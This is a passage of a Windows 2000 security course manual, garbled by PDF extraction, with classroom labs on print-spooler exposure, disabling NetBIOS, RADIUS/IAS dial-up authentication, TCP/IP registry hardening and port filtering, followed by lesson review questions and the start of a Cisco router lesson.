For the following tasks, students should work in pairs. The tasks refer to the machines as Student_P and Student_Q. These pairs of machines will participate in a le- and printer-sharing exercise, where all the computers designated as Student_P are Windows clients and the computers designated as Student_Q are le and print servers. Also, while on the subject of print shares, you will address the issue of spooler le insecurity that was discussed earlier. You will take a look at the contents of a spooled le. You will also capture information being sent to a network printer. You will view the contents of this capture. What you will realize pretty soon is that information that is classied should be sent only to print servers that are classied. The printers should also be physically secure. Folders that hold spooled les should be secure. It goes without saying, then, that network traffic should be secure.
PL
IC
AT
iti
on
TASK 4G-1
Investigating Printer Spooler Security
Note:Perform step 1 through step 18 only if you are designated as Student_Q. 1. 2. 3. 4. 5. 6. 7. 8. 9. In your boot partition, create a folder named Share. Right-click this folder, and choose Sharing.
Click Share This Folder, leave the default share name as Share, and click OK.. From the Start menu, choose SettingsPrinters. Double-click Add Printer. Click Next.
Ed
T DU PL IC
Verify that Use The Following Port is selected, leave it at the default port (LPT1:), and click Next. Select any printer from the list, and click Next.
10. Shorten the printer name to the rst four letters, and click Next.
11. Allow the printer to be shared, leave the share name to whatever is displayed, and click Next twice. 12. When you are prompted to print a test page, click No, and then click Next and click Finish. 13. Select the printer, and choose FileServer Properties.
st
15. Click OK.
17. Click the Advanced tab, and verify that the printer is always available, and that documents will be spooled to speed up printing. 18. Check Keep Printed Documents, and click OK.
In
16. Right-click the printer and choose Properties.
DO
14. Click the Advanced tab, and note the default location of the spool folder. It should be \WINNT\System32\Spool\PRINTERS.
ru ct
NO
or
AT
Verify that Local Printer is selected. Uncheck Automatically Detect And Install My Plug And Play Printer. Click Next.
E
299
iti
on
Setup: You are logged on to Windows 2000 as the renamed Administrator account. If you have been designated as Student_P, you will act as a Windows client; if you have been designated as Student_Q, you will act as a Windows le and print server.
Note: Perform step 19 through step 26 only if you are designated as Student_P. 19. Double-click My Network Places.
21. Double-click the print server.
22. Right-click the printer name (next to the shared printer icon), and choose Connect.
24. Enter the text This is a classied document.
25. Save the le to your Desktop with the lename TOP_SECRET.txt. 26. Choose FilePrint, select the printer you just connected to and click Print. Your le should be sent to the print server. Note: Perform step 27 through step 35 only if you are designated as the print server (Student_Q). 27. Observe the screen. Now, although there is no physical printer (or print device in Microsoft terminology) attached to your machine, the print server will try to send this job off through LPT1, and a short while later will report an error in the form of a pop-up message.
Ed
T DU
or
DO NO
28. When the error message is displayed, click Cancel. 29. Navigate to the \WINNT\System32\Spool\PRINTERS folder.
In
300
st
ru ct
30. Observe the contents of the Printers folder. The les sent for printing are sitting there. They have job numbers followed by .SHD and .SPL le extensions. The SPL les are the actual spooled les and the SHD les are the spool header les. The SPL le is the one that interests us.
31. Double-click the SPL le.
32. When the Open With dialog box is displayed, uncheck Always Use This Program To Open These Files, and then select Notepad from the list. 33. Scroll down to the bottom of the le. Towards the end of the le, after all the printer language is taken care of you will see the name of the le and its contents. 34. Double-click the SHD le. 35. Uncheck Always Use This Program To Open These Files, and then select Notepad from the list. You will see who sent this le and from which computer. How dangerous could this information be if it was really classied and
PL
IC
AT
iti
23. Start Notepad.
on
20. Double-click Computers Near Me.
someone with malicious intent congured the print server to Keep Printed Documents? 36. Close both instances of Notepad.
Several networks will stipulate the disabling of NetBIOS on the network, as it provides much information to potential attackers. In the following task, you will examine the network performance when the server is congured not to communicate using NetBIOS.
TASK 4G-2
Communication without NetBIOS
Note:Perform step 1 through step 4 only if you are designated as the client (Student_P). 1. 2. 3. 4. From the Start menu, choose SettingsPrinters.
Ed
T DU PL IC
Right-click the printer, choose Delete, and then click Yes.
From the Start menu, choose Run, and enter \\NetBIOS_Name_of_ SERVER to display an Explorer window that shows you a list of shares on the server. Note: Perform step 5 through step 7 only if you are designated as the print server (Student_Q).
5. 6. 7.
Open a command prompt, and enter nbtstat -S to display NetBIOS connections.
Leave the command prompt open.
st
Note: Perform the following step only if you are designated as the client. 8. Close all open windows.
9.
In
Note: Perform step 9 through step 20 only if you are designated as the server.
Re-enter the command nbtstat -S to refresh the display of NetBIOS connections.
DO
NO
Observe the NetBIOS connections listed for the interface that the two computers are using for the communications.
ru ct
or
If necessary, click OK to close the Printers information box.
AT
E
301
iti
on
Communicating without NetBIOS
10. Observe that there is one less NetBIOS connection. If the connection is still displayed, wait a few minutes and try again. 11. Now, right-click My Network Places, and choose Properties. 12. Double-click the Classroom Hub interface, and click Properties. 13. Select Internet Protocol, and then click Properties. 14. Click Advanced, and then click the WINS tab. 15. Select Disable NetBIOS Over TCP/IP.
17. Click OK twice, and then click Close.
19. In the command prompt, re-enter the command nbtstat -S to refresh the display. 20. Observe that there are no NetBIOS connections now. Note: Perform step 21 through step 23 only if you are designated as the client. 21. In the Run dialog box, re-enter \\NetBIOS_Name_of_SERVER to try and get a list of shares on the server. You should see an error message. Click OK.
Ed
T DU
18. Repeat the last six steps to disable NetBIOS on each network interface in your computer.
or
DO NO
If students cannot access the list of shares, have them check to make sure that the remote account has not been locked out.
In
302
st
ru ct
22. In the Run dialog box, enter \\IP_address_of_SERVER to try to get that list of shares. If necessary, use your partners remote credentials to log on. You should now see an Explorer window open showing you a list of shares on the server.
Note: Perform the rest of this task only if you are designated as the server.
24. Re-enter the command nbtstat -S to refresh the display. 25. Observe that, even though the client is connected, there are no NetBIOS connections. Your connection is based on pure IP. From this, we can gather that the NetBIOS protocol is really not necessary for a Windows 2000 networkalthough, for backward compatibility, Microsoft will not let you install a Windows 2000 machine without a NetBIOS computer name. If (host) name resolution is required, it can be achieved via the Internet standard DNS. 26. Close all open windows.
PL
IC
AT
iti
16. Click OK, and then click Yes to acknowledge the pop-up message.
on
NAT and ICS

Up to this point, all of the security systems and methods you have been using are geared towards securing the operating system and data on the physical hard drive. All of the security systems that you create are of little use if an attacker is able to simply sniff all the packets off the network and recompile them at his or her leisure. Network Address Translation (NAT) is an Internet standard that is dened in RFC 1631. NAT is used to mask internal IP addresses with the IP address of the external Internet connection. Although NAT was not designed as a security mechanism, many networks require NAT in their security policies to add an additional layer between the Internet and the intranet.
10.0.0.0 through 10.255.255.255.255 172.16.0.0 through 172.31.255.255 192.168.0.0 through 192.168.255.255
Ed
T DU PL IC
NAT functions by taking a request from an internal client and making that request to the Internet on behalf of the internal client. By using this conguration, clients on the internal network are not required to have a public IP address, thus conserving public IP addresses. The internal clients can be congured with an IP address from the private network blocks. Remember, private IP addresses are ones that are not routed on the Internet. They are dened by RFC 1918, and the address ranges are:
NAT is an integrated part of Routing and Remote Access Services (RRAS), which will be addressed shortly, as well as part of Internet Connection Sharing (ICS). The version of NAT that is used by ICS is scaled down form the full version and does not allow for the level of conguration that the RRAS NAT allows. ICS is designed for a small office or for a home network, where there is one Internet connection that is to be shared by the entire network. All users connect via a single interface, usually connected via a modem, DSL, or cable access point.
st
Routing protocols (RIP and OSPF)
Remote Authentication Dial-In Service (RADIUS)
The Remote Access Server of RRAS will allow for PPP connections, and can be set up to require authentication. For authentication, RRAS can be set up to use the Remote Authentication Dial-In User Service (RADIUS) or Windows Authentication. If RRAS is using RADIUS, when a user request for authentication is made to the RRAS server, the dial-in credentials are passed to the RADIUS server. The RADIUS server then performs the authentication and authorization to access for the client to access the network.
In
DO
The Windows 2000 Routing and Remote Access Service (RRAS) is made of several components, including: Network Address Translation (NAT)
NO
Remote Access
ru ct
or
AT
It is also worth noting that Microsoft has uses another range for private addressing: 169.254.0.0 through 169.254.255.255. This range is not dened in the RFC, but it does allow for other private addresses to be used on a network.
E
303
iti
on
RADIUS Implementation in the Classroom
Student_Q: Windows 2000 Server as a RADIUS Client.
ru ct
1. 2. 3.
TASK 4G-3
Physically Preparing for RADIUS Implementation
Verify that the null modem cable between the Dialup Client and the RADIUS Client is rmly in place.
st
In
If necessary, on the RADIUS Client, disable the Ethernet adapter connected to the Dialup Client, but leave the Ethernet adapter connected to the classroom hub enabled. See the class conguration diagram that follows for guidance. On the RADIUS Server, do nothing. All of the RADIUS Clients will contact this server via the existing network.
4.
304
DO
On the Dialup Client, disable both Ethernet adapters.
NO
Objective: To take care of some physical connectivity issues prior to implementing RADIUS in the classroom.
DU
PL
IC
Instructor_Machine: Windows 2000 Server as a RADIUS Server.
or
AT
For the rest of the tasks associated with implementing RADIUS, these machines will be referred to as follows: Student_P: Windows 2000 Server as a Dialup Client.
Ed
The following section contains several long tasks, involving the implementation of the RADIUS server and the RADIUS client. For these tasks, students should work in pairs (Student_P and Student_Q). These pairs of machines will participate in a RAS exercise where all of the computers designated as Student_P are congured as the Remote Access Client (or Dialup Client) and dial out to their corresponding Dialup Server, which are the computers designated as Student_Q. These Dialup Servers will also be congured as RADIUS client. These RADIUS clients will pass on authentication requests to the Instructor Machine, which will be congured as the RADIUS Server. Thus, the Instructor Machine will function as the RADIUS Server for the whole class and is an integral part of the task.
iti
on
The Remote Access Policy is controlled via the Internet Access Server (IAS), which is the Microsoft implementation of RADIUS. The Remote Access Policy is not controlled by the RRAS server itself. The IAS performs several functions for remote users of the network, including authentication, authorization, auditing, and accounting, to those users who connect to the network via dial-up and VPN connections. For authentication, IAS allows for great exibility, accepting PAP, CHAP, MS-CHAP, and EAP. EAP is Extensible Authentication Protocol and is used in conjunction with technologies such as Smart Cards, Token Cards, and one-time passwords.
You should have a class conguration that looks like the following graphic.
Ed or
DO NO
Configuring the Dialup Server
ru ct
Configuring the Dialup Server Configuration

Note:Perform this task only if you are designated as a RADIUS Client. 1. 2.
In
From the Start menu, choose SettingsNetwork And Dial-up Connections. Verify that the Ethernet connection connected to your neighbors computer is disabled.
st
TASK 4G-4
In the next task, you will congure the Dialup Server component of the RADIUS Client. You will congure this server to allocate IP addresses to Dialup Clients for the dialup interfaces. For the task, if the RADIUS Client is on the left side of the classroom and is seat number 3, then the range you should use is 192.168. 163.101 to 192.168.163.110. If the RADIUS Client is on the right side of the classroom and is seat number 8, then the range you should use is 192.168.188. 101 to 192.168.188.110. Your instructor will clarify addressing requirements if you have any doubts at this point.
DU
PL
IC
AT
E
305
iti
on
3.
Open a command prompt, and use the ipcong /all command to verify that you have just one IP address. This should be in either the 172.16.x.x or 172.18.x.x network. Close the command prompt. Double-click Make New Connection, provide the local area code (if prompted), and then click Next. Click Connect Directly To Another Computer, and click Next. Select Host, and click Next. Select the device (Communications Port [COM1]), and click Next. In the next box, you are supposed to select those users who can dial in; however, this RAS server will eventually be congured as a RADIUS client. So for now, we will congure a user only for the purposes of testing the modem connection.
4. 5.
6. 7. 8. 9.
Click Add. For the User Name, enter radtest.
Click Next.
Read the name for your connection, and click Finish. It might take a while for the Wizard to close, so be patient.
or
DO NO
11. Click the Networking tab, select Internet Protocol (TCP/IP), and click Properties. 12. Under TCP/IP Address Assignment, click Specify TCP/IP Addresses.
ru ct
13. Click OK twice.
14. Open Control Panel.
15. Double-click Phone And Modem Options. 16. Click the Modems tab.
In
306
st
17. If necessary, select Communications Cable Between Two Computers, and click Properties. 18. Under Maximum Port Speed, select 115200 from the drop-down list. 19. Click OK twice, and then close all open windows.
DU
If you are on the right side of the classroom, enter the range 192.168. 18x.101 to 192.168.18x.110, where x is your seat number.
PL
If you are on the left side of the classroom, enter the range 192.168.16x. 101 to 192.168.16x.110, where x is your seat number.
IC
AT
10. Right-click Incoming Connections, and choose Properties.
Ed
For Password, enter aA123456, conrm it, and click OK.
iti
on
Configuring the Dialup Client

Once the Dialup Server has been congured, a signicant portion of the initial conguration has been completed. The next part of the process will be to congure the clients for dial-up usage. The setup of the two computers remains the same for this portion of the RADIUS implementation tasks.
TASK 4G-5
Configuring the Dialup Client
Note:Perform step 1 through step 20 only if you are designated as a Dialup Client. 1. 2. 3. 4. 5. From the Start menu, choose SettingsNetwork And Dial-up Connections. Verify that your Ethernet connections are disabled.
Open a command prompt, and use the ipcong /all command to verify that you have no IP addresses. Close the command prompt. Double-click Make New Connection, provide the local area code (if prompted), and click Next.
Ed
T DU PL IC
6. 7. 8. 9.
Provide a name for your direct connection, such as DUN_01, and click Finish. It might take a while for the wizard to close, so be patient. When you are prompted to make a connection, click Cancel. Open Control Panel.
Double-click Phone And Modem Options.
11. Select Communications Cable Between Two Computers, and click Properties.
st
12. Under Maximum Port Speed, select 115200 from the drop-down list. 13. Click OK twice.
15. For Maximum Speed (bps), select 115200 from the drop-down list. 16. Click OK twice.
17. Double-click your direct connection.

In
14. Right-click your direct connection, choose Properties, and then click Congure.
DO
NO
10. Click the Modems tab.
ru ct
or
Click Connect Directly To Another Computer, and click Next. Select Guest, and click Next. Select the device (Communications Port [COM1]), and click Next twice.
AT
iti
on
18. For the User Name and Password, enter radtest and aA123456, respectively, and click Connect. You should be connected to the dialup server in a few seconds. 19. Click OK to close the Connection Complete information box.
Note: Perform the next step only if you are designated as a RADIUS Client. 21. Verify your IP address(es) by using the ipcong /all command in a command prompt. You should now have a 192.168.16x.y or 192.168.18x.y address assigned to the dialup interface. Close the command prompt. Note: Perform the next step only if you are designated as a Dialup Client. 22. In the Network And Dial-up Connections Control Panel, right-click your direct connection, and choose Disconnect.
Creating Users on the RADIUS Server
Ed
T DU
or
DO NO
In
308
st
ru ct
1. 2. 3. 4. 5. 6. 7. 8. Click Create.
INSTRUCTOR TASK 4G-6
Creating Users on the RADIUS Server

Setup: Your instructor will perform this task at the Instructor Machine.
If necessary, log on to Windows 2000 Server as Administrator. Right-click My Computer, and choose Manage. In the left pane, expand Local Users And Groups and right-click the Users folder. Choose New User. For User Name, enter RaduserL1.
For Password, enter aA123456, and conrm it. Uncheck User Must Change Password At Next Logon. Check User Cannot Change Password and Password Never Expires.
PL
IC
Now that the Dialup Server and Dialup Client congurations have been completed, it is time to move on to the RADIUS Server. Because each machine in the classroom cannot be a server, your instructor will congure the Instructor Machine to be the RADIUS Server. Pay close attention to the steps being taken. First, a database of users will be created (this is the kind of task that an ISP would perform to keep its user database centrally located).
AT
iti
on
20. Verify your IP address by using the ipcong /all command in a command prompt. You should have a 192.168.16x.y or 192.168.18x.y address assigned to the dialup interface. Close the command prompt.
9.
Repeat the last ve steps to create users named RaduserL3, RaduserL5, RaduserL7, RaduserR1, RaduserR3, RaduserR5, and RaduserR7.
10. Click Close. 11. Click the Users folder. 12. Verify the names of the users you just created. 13. Inform each student pair (Dialup Client and RADIUS Client) which Raduser account they will use later when testing RADIUS authentication. For example, the second pair on the right side of the classroom should use RaduserR3. 14. Leave the Computer Management MMC open.
INSTRUCTOR TASK 4G-7

Installing IAS
or
DO NO
ru ct
Setup: Your instructor will perform this task at the Instructor Machine. 1. 2. 3. 4. 5. 6. 7. 8. 9. Right-click My Network Places, and choose Properties.
Select Networking Services, and click Details.
From the Start menu, choose ProgramsAdministrative ToolsInternet Authentication Service.
In
In the left pane, right-click Clients, and choose New Client. You will be prompted to enter a friendly name. For Friendly Name, enter RADCLIENT_L01 and click Next.
Enter the IP address of the RADIUS Client belonging to the rst student pair on the left side of the class. For Shared Secret and Conrm Shared Secret, enter secret.
st
Check Internet Authentication Service, and click OK. IAS is Microsofts implementation of RADIUS. Click Next.
Choose AdvancedOptional Networking Components. Do not check or uncheck any boxes.
DU
PL
IC
AT
User accounts have been created for the remote access connections. Next, IAS will be installed on the Instructor Machine to make it a RADIUS Server. Following that, RADIUS Clients that are allowed to communicate with the RADIUS Server will be specied on the RADIUS Server. A policy will also be congured on the RADIUS Server to allow users who meet the authentication requirements to be granted access.
Ed
IAS
iti
on
10. Click Finish. 11. Repeat the last ve steps to account for all RADIUS Clients in the class, on both the left and right sides. 12. In the left pane, click Remote Access Policies. 13. In the right pane, double-click the policy.
14. Under If A User Matches The Conditions, select Grant Remote Access Permission. 15. Click OK, and close all open windows.
RIP
Setup: This task requires the instructor and students to perform steps. Note:Perform step 1 through step 6 only if you are the instructor.
or
DO NO
ru ct
2. 3. 4. 5. 6.
1.
From the Start menu, choose ProgramsAdministrative ToolsRouting And Remote Access. In the left pane, right-click your computer name, and choose Congure And Enable Routing And Remote Access. Click Next, select Manually Congured Server, click Next, and then click Finish. When you are prompted to start the service, click Yes.
In the left pane, expand the computer name, and then expand IP Routing. Right-click General, choose New Routing Protocol, and select RIP, or RIPv2 (whichever is listed). Click OK. Right-click RIP, choose New Interface, select your network interface, and click OK twice. Close the RRAS console. Note: Perform step 7 through step 12 only if you are designated as a RADIUS Client.
In
310
st
7.
Form the Start menu, choose ProgramsAdministrative ToolsRouting And Remote Access.
DU
PL
IC
AT
Installing RIP
TASK 4G-8
Ed
To allow Dialup Clients to eventually communicate, the Dialup Servers need to know the various networks that will be coming up and create routes for them. So, you will install RIP, because that is all that is required in this classroom. A more complicated network will need more sophisticated dynamic routing protocols.
iti
on
8. 9.
In the left pane, right-click your computer name, and choose Congure And Enable Routing And Remote Access. Click Next, select Manually Congured Server, click Next, and then click Finish. When you are prompted to start the service, click Yes.
11. Right-click General, choose New Routing Protocol, and select RIP. Click OK. 12. Right-click RIP, choose New Interface, select your network interface, and click OK twice.
Configuring the Dialup Server as a RADIUS Client
Configuring the Dialup Server as a RADIUS Client

Note:Perform this task only if you are designated as a RADIUS Client. 1. 2. 3. 4. 5. 6. 7. 8. 9.
or
DO NO
Under Authentication Provider, select RADIUS Authentication from the drop-down list. Click the Congure button found to the right of the drop-down list. Under The Following RADIUS Servers Are Queried In Order From The Highest To The Lowest Score, click Add. Specify the IP address of the RADIUS Server. This is your instructor machines IP address, which should be 172.17.10.1. For Secret, click the Change button, and enter the same secret your instructor entered on the RADIUS Server (the word secret). Observe that the registered UDP port number used for RADIUS authentication is 1812. Click OK.
In
st
DU
Click the Security tab.
ru ct
In the left pane, right-click your computer name, and choose Properties.
PL
IC
AT
E
311
TASK 4G-9
Ed
In this next task, you will congure your Dialup Server to behave as a RADIUS Client. Unlike the RADIUS Server, no extra software needs to be added to your server. Its just a matter of conguring your Dialup Server for pass-through authentication.
iti
on
10. In the left pane, expand the computer name, and then expand IP Routing.
10. Observe that there is a value of 30 under Initial Score. What this means is that you can congure your RADIUS Client to send authentication requests to more than one RADIUS authentication server. When you have more than one server to choose from, the server with the higher number is checked rst. The scale runs from 0 to 30.
12. If you are prompted to restart RRAS, click OK; you will do this shortly anyway. 13. Perform the same sequence of steps to congure your RADIUS Client to communicate with a RADIUS Accounting provider. 14. Click OK. Acknowledge any information boxes regarding restarting the service. 15. In the left pane, right-click your computer name, choose All Tasks Restart. 16. After the Restarting process box closes, close the RRAS console.
Testing the Dialup Client
Ed
T DU
or
DO NO
In
312
st
ru ct
TASK 4G-10
1. 2. 3. 4.
Testing the Dialup Client
Note:Perform this task only if you are designated as a Dialup Client. In the Networking And Dial-up Connections Control Panel, double-click your dialup connection. For the User Name and Password, enter the appropriate Raduser name (such as RaduserL1, depending on which student pair youre part of) and aA123456, and click Connect. You should be authenticated by the RADIUS Server and connected to the RADIUS Client (which is your dialup server) in a few seconds. Click OK to acknowledge the Connection Complete information box. Verify your IP address by using the ipcong /all command at a command prompt. When you connected to the RADIUS Client, you had a 192.168.16x.y or 192.168.18x.y address. You should now see a different address assigned to the dialup interface.
PL
IC
Now that all the necessary components for RADIUS are in place, you will test it. From the Dialup Client, you will make a call to the Dialup Server. Because you have congured this server for pass-through authentication, any authentication request you receive on the Dialup Server will be sent to the RADIUS Server. If authentication is approved, the Dialup Client will be able to connect, receive an IP address, and be part of the network.
AT
iti
on
11. Click OK.
Because you logged on as RaduserX, only the RADIUS Server could have authenticated you. The RADIUS Client simply passed on this authentication request to the RADIUS Server and passed the approval back to the Dialup Client. 5. Close the command prompt.
Bringing Back the Network
Reconfiguring the Network
Note:Perform step 1 through step 2 only if you are designated as a Dialup Client. 1. 2. If necessary, open the Networking And Dial-up Connections Control Panel. Right-click your dialup connection, and choose Disconnect.
Ed
T DU PL IC
TASK 4G-11
Note: Perform step 3 through step 4 only if you are designated as a RADIUS Client.
4.
Right-click and enable the Partner interface. Close all open windows.
st
In
DO
ru ct
3.
Right-click My Network Places, and choose Properties.
NO
or
Right-click and enable your network interfaces. Close all open windows.
AT
E
313
iti
Once you have tested the RADIUS conguration, you need to return the classroom conguration to the state it was in before you started the RADIUS tasks. The following quick task will walk you through what is required to bring the network back to normal status.
on
Hardening TCP/IP
The TCP/IP stack in Windows is one of the most attacked components of personal computers. Common attacks include Denial of Service (DoS) attacks, Distributed Denial of Service (DDoS) attacks, spoong, smurf, and Land attacks, just to name a few. There are some congurations that can be made to the Registry to harden the actual TCP/IP stack in Windows 2000. These congurations are recommended by Microsoft, are designed to specically help defend against Denial of Service attacks and should be another component of your layered defense. The following settings can be congured in the Registry. Remember to be careful in the Registry, as errors in conguration can cause Windows to no longer function properly and could require a reinstall. All of the following congurations, which are all hexadecimal valuesunless noted otherwise, are found in this Registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.
Hardening the TCP/IP Stack
Conguring this value will modify how Windows reacts to SYN-ACKS, which are often used in DoS attacks. The result of this conguration is to modify the response timeout when a DoS attack is detected. In order to determine if an attack is in progress, Windows will use the following three values: TCPMaxPortsExhausted TCPMaxHalfOpenRetried
There are three options for this value. The specics are dened as follows: Value Name: SynAttackProtect Key: Tcpip\Parameters Valid Range: 0, 1, 2 Default Value: 0 Value Type: REG_DWORD
or
DO NO
ru ct In
A setting of 0 is the default, which Windows denes as typical protection against SYN attacks. A setting of 1 will cause TCP to adjust the retransmission rates of SYN-ACKS, so that connection responses will time out quicker during SYN attacks. A setting of 2 is considered the strongest protection against SYN attacks. This setting will cause TCP connection requests to time out even quicker during SYN attacks. From a security perspective, a setting of 2 is recommended.
st
Dead Gateway
Multiple gateways can be congured in the settings of TCP/IP. You can, however, disable this function, since a Denial of Service (or other) attack can cause your machine to switch gateways. The specics for this are dened as follows: Value Name: EnableDeadGWDetect Key: Tcpip\Parameters Value Type: REG_DWORD Valid Range: 0 (False), 1 (True) Default Value: 1 (True)
DU
PL
IC
AT
TCPMaxHalfOpen
Ed
smurng: A denial of service attack in which an attacker spoofs the source address of an echorequest ICMP (ping) packet to the broadcast address for a network, causing the machines in the network to respond en masse to the victim.
Syn Attack Defense
iti
Denial of Service: Action(s) which prevent any part of an AIS from functioning in accordance with its intended purpose.
on
A setting of 1 will allow TCP to perform dead-gateway detection and change to a backup gateway. A setting of 0 will disallow this function. From a security perspective, a setting of 0 is recommended.
MTU Restrictions
Value Name: EnablePMTUDiscovery Key: Tcpip\Parameters Valid Range: 0 (False), 1 (True) Default Value: 1 (True)
Keep Alive
or
DO NO
Default Value: 7,200,000 (two hours)
The recommended setting for this value is 300,000, which is ve minutes.
TASK 4G-12
1. 2. 3.
In
Note:This task should be performed by all students. Open a Registry Editor. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services. Open the Tcpip\Parameters key.
st
Configuring TCP/IP in the Registry
DU
Valid Range: 1-0xFFFFFFFF
ru ct
Value Type: REG_DWORD (The value is in milliseconds)
PL
Key: Tcpip\Parameters
IC
Default TCP behavior in Windows does not verify idle connections. It is recommended that these connections be veried (using third-party software, if need be) for availability by sending a keep-alive packet and waiting for the response. If there is no response, then the idle connection can be closed. The specics for adjusting this value are dened as follows: Value Name: KeepAliveTime
Ed
A setting of 1 will allow TCP to discover the largest segment size to a remote host. A setting of 0 will x the MTU size to 576 bytes for all communication with a host not on the local subnet. Communication to local hosts will still use the largest segment sizeonly remote host communication is affected. From a security perspective, a setting of 0 is recommended.
AT
iti
on
Attackers can use the Maximum Transmission Unit to force a network to use very small segments. By using Path MTU Discovery, TCP tries to identify the largest packet size that a path to a remote host will accommodate. Conversely, when used incorrectly, the network can be ooded with tiny segments. The specics for adjusting this value are dened as follows:
4.
In the right pane, right-click and add the following REG_DWORD values: a. b. c. d. SynAttackProtect EnableDeadGWDetect EnablePMTUDiscovery KeepAliveTime
5. 6. 7. 8. 9.
Double-click SynAttackProtect, and enter a value of 2.
Double-click EnableDeadGWDetect, and enter a value of 0.
Double-click KeepAliveTime, and enter a decimal value of 300,000. In Hex notation, this is 493E0. Close the Registry Editor.
TCP/IP Filtering
ru ct
Protocol Number
1 6 17
Protocol Acronym
IP TCP UDP
DU
PL
When you are conguring ltering, you have the option to control access to TCP ports, to UDP ports, and to specic IP protocols. Each access point is controlled by the numerical value. In other words, you control port access by the port number, such as 80 for WWW access. To control an entire protocol, use the IP protocol number. The following table lists, for quick reference, several common IP protocol numbers to use in ltering.
or
DO NO
IC
In
316
st
When you enable TCP/IP ltering on one interface, it is enabled on all interfaces; however, you must congure the specic lters on a per-interface basis. When you are conguring the port lters, the options are to enable all ports or to dene the ports that are to be allowed. Remember that this is conguring inbound portsnot outbound. The system will not lter responses to requests initiated by the host, so you will not need to open high ports for network responses. Finally, if you want to lter protocols, be aware that you cannot block ICMP messages. This is the case, even if you exclude IP Protocol 1 from the allowed protocol list. A simple way to block TCP traffic, for example, is to select the option to lter TCP ports, but not add any ports to the allowed list.
AT
Another built-in Windows 2000 feature that you can add to your layered defense is TCP/IP ltering. TCP/IP ltering is a method of controlling inbound network access to a host. TCP/IP ltering is independent of other processes, such as IPSec, and other services, such as the Server and Workstation services. To control outbound access, you need to implement Routing And Remote Access lters.
Ed
Full Name of Protocol

Internet Protocol Transmission Control Protocol User Datagram Protocol
iti
Double-click EnablePMTUDiscovery, and enter a value of 0.
on
TASK 4G-13
Configuring Port and Protocol Filtering
1. 2. 3. 4. 5. 6. 7. 8. 9.
Navigate to the Properties for the Classroom Hub interface. Scroll to and select Internet Protocol (TCP/IP), and then click Properties. Click the Advanced button. Display the Options tab. Select TCP/IP Filtering, and click Properties. Check Enable TCP/IP Filtering.
Permit only the following TCP ports: 20, 21, 23, 25, 80, 110, and 443. Permit only the following protocols: 6 and 17. Click OK to implement your ltering.
Ed
T DU PL IC
11. Click OK twice to close the TCP/IP and Interface Properties.
13. Go back and revert to the unltered settings to allow for the remainder of the tasks to function with no restrictions. 14. This time, restart your computer when you are prompted to. Then, log on as the renamed Administrator account and verify that the TCP/IP settings are correct. 15. Close all open windows.
st
In
DO
ru ct
12. When you are prompted to restart the server, click No. To fully implement your changes, you would have to restart the server, however, for the purposes of this class, we need to have all ports and protocols available.
NO
or
AT
10. Click OK to close the Advanced TCP/IP Properties.
E
317
iti
on
Summary
Lesson Review
Answers will vary, however some of the components are: Active Directory, trees, forests, Organizational Units, and Group Policy Objects. Place the following GPOs in the order that they are processed. 2 1 4 3 Site Local OU
Ed
T DU
4A What are the new components of Windows networking that are introduced with Windows 2000?
or
DO NO
Domain
4B What are some of the authentication methods Windows 2000 supports?
In
318
st
ru ct
Kerberos, NTLM, RADIUS, SSL, and Smart Cards. What is the name of the component of the Windows 2000 architecture that makes the method of authentication transparent to an application developer? Security Support Provider Interface (SSPI). In Kerberos, you can implement Single Sign On (SSO) so that a user needs to enter their logon credentials only once to access all network services.
4C What are the three tools introduced in this topic for managing the security of the Windows 2000 network?
The secedit.exe tool, security templates, and the Security Conguration And Analysis Snap-in. What are the four basic levels for security templates? Basic, compatible, secure, and highly secure.
PL
IC
AT
iti
on
In this lesson, you were introduced to the fundamental issues of securing Windows 2000 computers and resources. You congured GPOs for the security of the infrastructure, described the process of local logon on Windows 2000, and implemented security tools, including secedit.exe and The Security Conguration And Analysis Snap-in. You then congured logging options, focusing on the Security Log, and implemented local encryption by using EFS. Finally, you examined methods of securing network communications and how to harden the TCP/IP stack in Windows 2000.
If you want to secure an IIS 5.0 server, which template should you implement? The hisecweb.inf template.
FAT, FAT32, and NTFS. How can you prevent subfolders from inheriting permissions from their parent folders? Have the parent security permissions applied To This Folder Only. What are the three levels of permission that can be granted to secure printers? Print, Manage Printers, and Manage Documents.
4E What command would you use to have an audit policy take effect immediately on the local machine?
The secedit /refreshpolicy machine_policy command.
What is the Event ID of a successful network logon event? 540. What is the Logon Type of an Interactive Logon? Logon Type 2.
Ed
T DU PL IC
4F In EFS, what is used to perform the encryption?

The File Encryption Key (FEK).
What is the encryption algorithm used by EFS? DES.
Do users require an Administrator to enable EFS on their systems?
st
HKEY_LOCAL_MACHINE.
In
How can you congure TCP/IP ltering on a Windows 2000 Server to lter outbound access? You cannot. TCP/IP ltering in Windows 2000 is designed to lter inbound access only.
DO
4G Which hive will you use if you want to make changes to the TCP/IP stack operation in a Windows 2000 computer?
NO
No, EFS is enabled by default, and a user can implement it without the Administrator being involved, unless there is a policy implemented that prevents it from being used.
ru ct
or
AT
E
319
iti
on
4D What are the three le systems discussed in this topic that are supported by Windows 2000?
Ed or ru ct st
In
DO
NO
DU
PL
IC
AT
iti
on
Overview
In this lesson, you will be introduced to the functioning of routers and routing protocols. The examples in this lesson are shown on Cisco Routers, specically the 2500 series. You will examine the issues of securing routers and routing protocols. You will remove unneeded services and crate access control lists to manage and secure the network. The lesson ends with the creation of logging options on the Cisco router.
Objectives
In this lesson, you will: 5A Congure fundamental router security.
Ed
T DU PL IC
You will create the required congurations to secure connections, create banners, and implement SSH. 5B Examine principles of routing.
5C
Congure the removal of services and protocols.
You will create the required congurations to harden the core services and protocols on a Cisco router.
You will create wildcard masks to be used in conjunction with the implementation of Access Control Lists.
st
5E
Implement Cisco Access Control Lists.
You will create the required congurations to implement Access Control Lists to defend against network attacks on a Cisco router. 5F
In
Congure logging on a Cisco router. You will create the required congurations to enable logging on a Cisco router.
DO
NO
5D
Examine the function of Access Control Lists on a Cisco router.
ru ct
You will capture routing protocols and analyze the IP and MAC relationship in a routed environment.
or
Lesson 5: Routers and Access Control Lists
AT
E
321
iti
on
Routers and Access Control Lists
LESSON
Data Files ping-arp-mac.cap rip update.cap ripv2withAuthentication. cap Lesson Time 6 hours
Topic 5A
Fundamental Cisco Security
Cisco Router Language
Cisco Router Terminology
A Fast Ethernet interface always starts with an F.
An interface that is connected to a serial connection always starts with an S. An interface that is connected to a Token Ring segment always starts with To.
Finally, the rst Token Ring interface on the router is To0.
or
DO NO
Likewise, the rst serial interface on the router is S0.
Cisco Operating System
ru ct
322
In
